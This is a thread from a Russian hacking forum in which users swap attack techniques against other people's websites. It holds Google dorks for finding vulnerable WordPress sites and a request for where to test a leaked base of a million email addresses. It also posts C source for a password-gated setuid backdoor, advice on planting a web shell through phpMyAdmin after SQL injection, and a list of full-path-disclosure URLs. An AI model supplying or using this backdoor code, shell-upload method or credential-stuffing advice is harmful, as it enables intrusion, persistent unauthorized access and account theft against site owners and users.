30.04.2012, 16:44
|
|
Новичок
Регистрация: 09.05.2009
Сообщений: 14
С нами:
8952073
Репутация:
3
|
|
Сообщение от Ereee
Хотя бы так
inurl:"?author=admin"
Человек тебе хотел помочь.
А если автор не админ? Ну зарегал себе ник другой?
|
|
|
30.04.2012, 17:25
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
Код:
inurl:"wp-login.php?action=register"
inurl:"plugins/wp-forum"
"index of /" wp-forum
Хотя бы так... |
|
|
|
30.04.2012, 20:36
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
С нами:
8395350
Репутация:
0
|
|
такой вопрос. Есть база мыльников(1кк, микс). На что её можно чекнуть? ICQ, steam,origin, twitter, facebook чекнуты. Мб есть что ещё?
|
|
|
|
30.04.2012, 20:52
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от Cock3r
Подскажите, пожалуйста, дорк для поиска WP блогов.
"powered by wordpress"
же
|
|
|
|
30.04.2012, 21:09
|
|
Новичок
Регистрация: 09.05.2009
Сообщений: 14
С нами:
8952073
Репутация:
3
|
|
Сообщение от попугай
"powered by wordpress"
же
Дык, затерают же часто.
|
|
|
|
30.04.2012, 21:14
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Скомпилируйте суидник на FreeBSD:
Код:
#include
#include
main(int argc, char *argv[]) {
if(argc == 3){
if(strcmp(argv[1],"cool_pass") == 0){
setgid(310);
setuid(16745);
system(argv[2]);
}
}
return 0;
}
|
|
|
|
30.04.2012, 23:51
|
|
Новичок
Регистрация: 01.06.2009
Сообщений: 7
С нами:
8917779
Репутация:
2
|
|
Через скулю получил доступ к phpMyAdmin, file_priv=Y, хочу залить шелл, но понял что не знаю полный пусть до папки! При раскрутке скули ошибок с раскрытием путей не было. Можно ли как нибудь средствами phpMyAdmin узнать путь, куда можно шелл ливануть?
|
|
|
|
01.05.2012, 00:03
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
попробуй подобрать для начало дефолтный путь до файла конфигов httpd.conf, в нем посмотри диру в какой сайт установлен, попробуй с нее index.php прочитать, если найдешь то пробуй заливаться в папки с изображениями или авами они часто с полными правами, что дает возможность заливаться...
P.S: вот список дефолтных логов можешь тут взглянуть /thread49775-default.html
еще также может гугл помочь с раскрытием путей попробуй дорк такого плана
Сообщение от None
site:test1.ru "mysql_"
|
|
|
|
01.05.2012, 00:06
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами:
8866466
Репутация:
564
|
|
ищи phpinfo
или
запросы которые могут привести к раскрытию путей
Код:
Full path disclosure :
/sсriрts/check_lang.php
/themes/darkblue_orange/layout.inc.php
/index.php?lang[]=
/index.php?target[]=
/index.php?db[]=
/index.php?goto[]=
/left.php?server[]=
/index.php?table[]=
/server_databases.php?token=your_token&sort_by="
/index.php?db=information_schema&token=your_token&tbl_group[]=
/db_printview.php?db="
/sql.php?back[]=
libraries/string.lib.php
libraries/storage_engines.lib.php
libraries/sqlparser.lib.php
libraries/sql_query_form.lib.php
libraries/select_theme.lib.php
libraries/select_lang.lib.php
libraries/relation_cleanup.lib.php
libraries/left_header.inc.php
libraries/import.lib.php
libraries/header_meta_style.inc.php
libraries/grab_globals.lib.php
libraries/get_foreign.lib.php (get_foreign.lib.php?field=foo&foreigners[foo]=foo)
libraries/display_tbl_links.lib.php (display_tbl_links.lib.php?doWriteModifyAt=left&edit_url=foo)
libraries/display_import.lib.php
libraries/display_export.lib.php
libraries/display_create_table.lib.php
libraries/display_create_database.lib.php
libraries/db_table_exists.lib.php
libraries/database_interface.lib.php
libraries/common.lib.php
libraries/check_user_privileges.lib.php
libraries/charset_conversion.lib.php (charset_conversion.lib.php?cfg[AllowAnywhereRecoding]=true&allow_recoding=true)
libraries/sqlvalidator.lib.php (libraries/sqlvalidator.lib.php?cfg[SQLValidator]=use=TRUE)
libraries/import/sql.php
libraries/fpdf/ufpdf.php
libraries/auth/cookie.auth.lib.php (libraries/auth/cookie.auth.lib.php?coming_from_common=true)
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
01.05.2012, 06:27
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от heJiZzZ
Через скулю получил доступ к phpMyAdmin, file_priv=Y, хочу залить шелл, но понял что не знаю полный пусть до папки! При раскрутке скули ошибок с раскрытием путей не было. Можно ли как нибудь средствами phpMyAdmin узнать путь, куда можно шелл ливануть?
Чаще:
/etc/conf/httpd/httpd.conf
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
